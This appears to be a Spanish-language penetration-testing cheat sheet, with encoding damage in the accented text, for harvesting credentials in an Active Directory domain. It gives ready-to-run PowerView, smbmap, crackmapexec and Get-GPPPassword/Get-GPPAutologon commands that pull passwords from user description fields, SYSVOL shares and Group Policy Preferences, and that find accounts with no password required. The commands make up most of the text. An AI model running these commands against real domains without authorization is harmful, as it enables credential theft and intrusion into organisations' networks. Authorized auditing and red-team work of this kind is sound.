Campo descripci贸n de los usuarios
Copiar # PowerView
Get-DomainUser * | Select-Object SamAccountName , Description | Where-Object { $_.Description -ne $null }
Find-UserField - SearchField Description - SearchTerm "<search-pattern>"
Recursos compartidos y scripts en SYSVOL
Copiar smbmap -H < IP-address-D C > -d < ACME.LOCA L > -u < use r > -p < passwor d >
smbmap -H < IP-address-D C > -d < ACME.LOCA L > -u < use r > -p < passwor d > -R "SYSVOL"
Group Policy Preferences (GPP)
Copiar crackmapexec smb < IP-address-D C > -u < use r > -p < passwor d > -M gpp_password
crackmapexec smb < IP-address-D C > -u < use r > -p < passwor d > -M gpp_autologin
Copiar # Get-GPPPassword.ps1
Import-Module . \Get-GPPPassword.ps1
Get-GPPPassword
Get-GPPPassword | ForEach-Object { $_.passwords } | Sort-Object - Uniq
# Get-GPPAutologon.ps1
Import-Module . \Get-GPPAutologon.ps1
Get-GPPAutologon
Get-GPPAutologon | ForEach-Object { $_.passwords } | Sort-Object - Uniq
El usuario no est谩 sujeto a la pol铆tica de contrase帽as, lo que significa que podr铆a tener una contrase帽a m谩s corta o ninguna contrase帽a (si se permiten contrase帽as vac铆as en el dominio).
Copiar # PowerView
Get-DomainUser - UACFilter PASSWD_NOTREQD | Select-Object SamAccountName , UserAccountControl